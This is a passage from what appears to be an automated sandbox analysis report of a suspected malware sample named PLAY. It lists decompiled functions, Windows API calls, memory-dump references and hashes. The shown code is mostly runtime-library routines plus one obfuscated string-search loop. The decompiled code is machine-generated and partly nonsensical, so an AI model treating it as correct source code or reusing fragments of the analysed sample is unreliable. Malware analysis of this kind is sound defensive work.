          • SetLastError.KERNEL32(00000000,00000002,000000FF,?,00000087,00AFA4F1,00AFC2F4,?,?,00AFB5D2), ref: 00AFC12D
          Memory Dump Source
          • Source File: 00000000.00000002.727887212.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
          • Associated: 00000000.00000002.727874344.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727915439.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727932991.0000000000B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727951285.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_ae0000_PLAY.jbxd
          Similarity
          • API ID: ErrorLast_free
          • String ID:
          • API String ID: 2283115069-0
          • Opcode ID: 6f7a57d0646bfb6ab277df675174a80e4257f13357615f1eb36d6ffa68cc2895
          • Instruction ID: 328e4ee7d0d119801defdf1e55992c1465f2d009f25ebee265aa54136f096dbb
          • Opcode Fuzzy Hash: 6f7a57d0646bfb6ab277df675174a80e4257f13357615f1eb36d6ffa68cc2895
          • Instruction Fuzzy Hash: 4A11A57220470DAADA21B7F66E85E7F365DABD1375B240224F725D31E2FF218C065111
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00B00E96 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
          Download Yara Rule
          C-Code - Quality: 100%
          			E00B00E96(void* _a4, long _a8, DWORD* _a12) {
				void* _t13;

				_t13 = WriteConsoleW( *0xb0b860, _a4, _a8, _a12, 0);
				if(_t13 == 0 && GetLastError() == 6) {
					E00B00E7F();
					E00B00E41();
					_t13 = WriteConsoleW( *0xb0b860, _a4, _a8, _a12, _t13);
				}
				return _t13;
			}




          0x00b00eb3
          0x00b00eb7
          0x00b00ec4
          0x00b00ec9
          0x00b00ee4
          0x00b00ee4
          0x00b00eea

          APIs
          • WriteConsoleW.KERNEL32(00AFA504,00000008,?,00000000,00AFA504,?,00B008F2,00AFA504,00000001,00AFA504,00AFA504,?,00AFFDDA,00000000,00000016,00AFA504), ref: 00B00EAD
          • GetLastError.KERNEL32(?,00B008F2,00AFA504,00000001,00AFA504,00AFA504,?,00AFFDDA,00000000,00000016,00AFA504,00000000,00AFA504,?,00B0032E,00B0A768), ref: 00B00EB9
            • Part of subcall function 00B00E7F: CloseHandle.KERNEL32(FFFFFFFE,00B00EC9,?,00B008F2,00AFA504,00000001,00AFA504,00AFA504,?,00AFFDDA,00000000,00000016,00AFA504,00000000,00AFA504), ref: 00B00E8F
          • ___initconout.LIBCMT ref: 00B00EC9
            • Part of subcall function 00B00E41: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00B00E70,00B008DF,00AFA504,?,00AFFDDA,00000000,00000016,00AFA504,00000000), ref: 00B00E54
          • WriteConsoleW.KERNEL32(00AFA504,00000008,?,00000000,?,00B008F2,00AFA504,00000001,00AFA504,00AFA504,?,00AFFDDA,00000000,00000016,00AFA504,00000000), ref: 00B00EDE
          Memory Dump Source
          • Source File: 00000000.00000002.727887212.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
          • Associated: 00000000.00000002.727874344.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727915439.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727932991.0000000000B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727951285.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_ae0000_PLAY.jbxd
          Similarity
          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
          • String ID:
          • API String ID: 2744216297-0
          • Opcode ID: 67a5865573395362db0b22a21bbc9abbb316359e14307aab0a69b3703f5438d0
          • Instruction ID: dcec206c40af0640cb62bf195e99be8be5b9562ceaf96e5fb841cdce043df1c2
          • Opcode Fuzzy Hash: 67a5865573395362db0b22a21bbc9abbb316359e14307aab0a69b3703f5438d0
          • Instruction Fuzzy Hash: E0F0AC3651415CBBCF226FD6EC04A9E7FA6FB283A1F048554FB19A6170DB32C820DB90
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00AFB710 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
          Download Yara Rule
          C-Code - Quality: 100%
          			E00AFB710() {

				E00AFC2CE( *0xb0d588);
				 *0xb0d588 = 0;
				E00AFC2CE( *0xb0d58c);
				 *0xb0d58c = 0;
				E00AFC2CE( *0xb0d118);
				 *0xb0d118 = 0;
				E00AFC2CE( *0xb0d11c);
				 *0xb0d11c = 0;
				return 1;
			}



          0x00afb719
          0x00afb726
          0x00afb72c
          0x00afb737
          0x00afb73d
          0x00afb748
          0x00afb74e
          0x00afb756
          0x00afb75f

          APIs
          • _free.LIBCMT ref: 00AFB719
            • Part of subcall function 00AFC2CE: RtlFreeHeap.NTDLL(00000000,00000000,?,00AFB5D2), ref: 00AFC2E4
            • Part of subcall function 00AFC2CE: GetLastError.KERNEL32(?,?,00AFB5D2), ref: 00AFC2F6
          • _free.LIBCMT ref: 00AFB72C
          • _free.LIBCMT ref: 00AFB73D
          • _free.LIBCMT ref: 00AFB74E
          Memory Dump Source
          • Source File: 00000000.00000002.727887212.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
          • Associated: 00000000.00000002.727874344.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727915439.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727932991.0000000000B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727951285.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_ae0000_PLAY.jbxd
          Similarity
          • API ID: _free$ErrorFreeHeapLast
          • String ID:
          • API String ID: 776569668-0
          • Opcode ID: ceb59f987dab097751a1f32d2badbcc0dc724df3f6ffcdc5d9093ee9d234c57a
          • Instruction ID: 98aac62c31a8a90edbc65b6bad41408612dc88e5ecaf501dcb3d0a6a65934d31
          • Opcode Fuzzy Hash: ceb59f987dab097751a1f32d2badbcc0dc724df3f6ffcdc5d9093ee9d234c57a
          • Instruction Fuzzy Hash: 75E0B6BA900128AAC602BFD6BE024A97E22E7747343414006FD40332B1CE310552EFD1
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00AEB041 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 119COMMON
          Download Yara Rule
          C-Code - Quality: 55%
          			E00AEB041(signed int __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __eflags, void* __fp0) {
				intOrPtr _t50;
				signed short* _t70;
				void* _t71;
				signed short* _t76;
				void* _t78;
				signed int _t100;
				signed int _t101;
				signed int _t104;
				void* _t106;
				signed int _t108;
				void* _t111;
				void* _t114;

				asm("into");
				 *((intOrPtr*)(__ecx - 0x4f6ff75f)) =  *((intOrPtr*)(__ecx - 0x4f6ff75f)) - __edi;
				 *((intOrPtr*)(__edi + 0x441)) =  *((intOrPtr*)(__edi + 0x441)) + __ebx;
				asm("movq xmm0, [0xb08ffc]");
				 *(_t108 - 0x80) = __eax;
				 *(_t108 - 0x7c) =  *0xb0900c & 0x0000ffff;
				_t50 =  *"debug"; // 0x75626564
				asm("movq [ebp-0xa4], xmm0");
				asm("movq xmm0, [0xb09010]");
				 *((intOrPtr*)(_t108 - 0x98)) = _t50;
				asm("movq [ebp-0xb4], xmm0");
				asm("movups xmm0, [0xb09028]");
				 *((intOrPtr*)(_t108 - 0x88)) = 0x3efd;
				_t104 = __edi - ( *(_t108 - 0xb0) >> 0x00000010 & 0x000000ff);
				 *((intOrPtr*)(_t108 - 0x8c)) = 0x70c7;
				asm("movups [ebp-0xc8], xmm0");
				 *((intOrPtr*)(_t108 - 0x90)) = 0x3df1;
				_t76 = E00AEAD90( *(_t108 - 0xb0) >> 0x00000010 & 0x000000ff, __ebx,  *(_t108 - 0x78), __edx, __edi, _t104, __fp0);
				 *(_t108 - 0x78) = _t76;
				if(_t76 == 0) {
					L14:
					__eflags =  *(_t108 - 4) ^ _t108;
					return E00AF7B30( *(_t108 - 4) ^ _t108);
				} else {
					_t100 = __edi - ( *(_t108 - 0x97) & 0x000000ff) & 0x0000ffff;
					 *(_t108 - 0x80) =  *_t76 & 0x0000ffff;
					 *(_t108 - 0x84) = ( *(_t108 - 0x7c) & 0x000000ff) + ( *(_t108 - 0x97) & 0x000000ff);
					if(_t104 > ( *(_t108 - 0xa2) & 0x000000ff)) {
						 *(_t108 - 0x84) = ( *(_t108 - 0xc4) & 0x0000ffff) * _t104 * _t104;
					}
					_t106 = 0xb0ba40;
					 *(_t108 - 0x71) =  *((intOrPtr*)(_t108 - 0x9d));
					_t78 = 0;
					 *((char*)(_t108 - 0x72)) =  *((intOrPtr*)(_t108 - 0x95));
					while(1) {
						_t101 = _t100 & 0x0000ffff;
						if(_t106 == 0) {
							asm("xorps xmm0, xmm0");
							 *((short*)(_t108 - 0x18)) = 0;
							asm("movups [ebp-0x28], xmm0");
							 *((intOrPtr*)(E00AFA4EC(__eflags))) = 0x16;
							E00AFA42F();
						} else {
							asm("movups xmm0, [esi]");
							_t26 = _t106 + 0x10; // 0x1eea1e77
							 *((short*)(_t108 - 0x18)) =  *_t26;
							asm("movups [ebp-0x28], xmm0");
						}
						_t100 = _t101 - 0x00000002 & 0x0000ffff;
						 *((intOrPtr*)(_t108 - 0x88)) =  *((intOrPtr*)(_t108 - 0x88)) +  *(_t108 - 0x84) +  *(_t108 - 0x84);
						_push(_t108 - 0x70);
						E00AED7D0(_t78, _t108 - 0x28, 0x24, _t100, _t106);
						 *((intOrPtr*)(_t108 - 0x8c)) =  *((intOrPtr*)(_t108 - 0x8c)) + 0xfffc;
						_t114 = _t111 - 8 + 0xc;
						 *(_t108 - 0x71) =  *(_t108 - 0x71) << 4;
						_t70 =  *(_t108 - 0x78);
						if( *(_t108 - 0x80) != 0x2e) {
							_t100 = _t100 + 0xffff;
							__eflags = _t100;
						} else {
							 *((intOrPtr*)(_t108 - 0x90)) =  *((intOrPtr*)(_t108 - 0x90)) + 0xfffc;
							 *((char*)(_t108 - 0x72)) =  *((char*)(_t108 - 0x72)) + 0xfc;
							_t70 =  &(_t70[1]);
						}
						_push(_t108 - 0x70);
						_push(_t70);
						_t71 = E00AF874B(_t108 - 0x70);
						_t111 = _t114 + 8;
						if(_t71 != 0) {
							break;
						}
						_t78 = _t78 + 0x12;
						_t106 = _t106 + 0x12;
						if(_t78 < 0xd92) {
							continue;
						} else {
							return E00AF7B30( *(_t108 - 4) ^ _t108);
						}
						goto L15;
					}
					goto L14;
				}
				L15:
			}















          0x00aeb041
          0x00aeb042
          0x00aeb048
          0x00aeb04e
          0x00aeb05b
          0x00aeb065
          0x00aeb069
          0x00aeb06e
          0x00aeb076
          0x00aeb07e
          0x00aeb084
          0x00aeb092
          0x00aeb09f
          0x00aeb0a9
          0x00aeb0ab
          0x00aeb0b5
          0x00aeb0bc
          0x00aeb0cb
          0x00aeb0cd
          0x00aeb0d2
          0x00aeb204
          0x00aeb209
          0x00aeb214
          0x00aeb0d8
          0x00aeb0ef
          0x00aeb0f5
          0x00aeb0ff
          0x00aeb107
          0x00aeb116
          0x00aeb116
          0x00aeb122
          0x00aeb127
          0x00aeb12a
          0x00aeb132
          0x00aeb135
          0x00aeb135
          0x00aeb13a
          0x00aeb14d
          0x00aeb150
          0x00aeb156
          0x00aeb15f
          0x00aeb165
          0x00aeb13c
          0x00aeb13c
          0x00aeb13f
          0x00aeb143
          0x00aeb147
          0x00aeb147
          0x00aeb172
          0x00aeb180
          0x00aeb18a
          0x00aeb18e
          0x00aeb19b
          0x00aeb1a2
          0x00aeb1ad
          0x00aeb1b0
          0x00aeb1b3
          0x00aeb1c5
          0x00aeb1c5
          0x00aeb1b5
          0x00aeb1b5
          0x00aeb1bc
          0x00aeb1c0
          0x00aeb1c0
          0x00aeb1ce
          0x00aeb1cf
          0x00aeb1d0
          0x00aeb1d5
          0x00aeb1da
          0x00000000
          0x00000000
          0x00aeb1dc
          0x00aeb1df
          0x00aeb1e8
          0x00000000
          0x00aeb1ee
          0x00aeb1fe
          0x00aeb1fe
          0x00000000
          0x00aeb1e8
          0x00000000
          0x00aeb1ff
          0x00000000

          APIs
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.727887212.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
          • Associated: 00000000.00000002.727874344.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727915439.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727932991.0000000000B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.727951285.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_ae0000_PLAY.jbxd
          Similarity
          • API ID: _wcsstr
          • String ID: .$debug
          • API String ID: 1512112989-877947429
          • Opcode ID: 80ca0a7932236e67124b8b2861748d1488ed17f839d50403fced16a444e2c3ba
          • Instruction ID: dcef71c1b7c7729474078442e3d529cd145e087bbd233a49836ff431b05be196
          • Opcode Fuzzy Hash: 80ca0a7932236e67124b8b2861748d1488ed17f839d50403fced16a444e2c3ba
          • Instruction Fuzzy Hash: 95519765D142AC8ACB219BB9C8553FDFBB0AF55310F1442AED948A3243EB340AC4DF61
          Uniqueness

          Uniqueness Score: -1.00%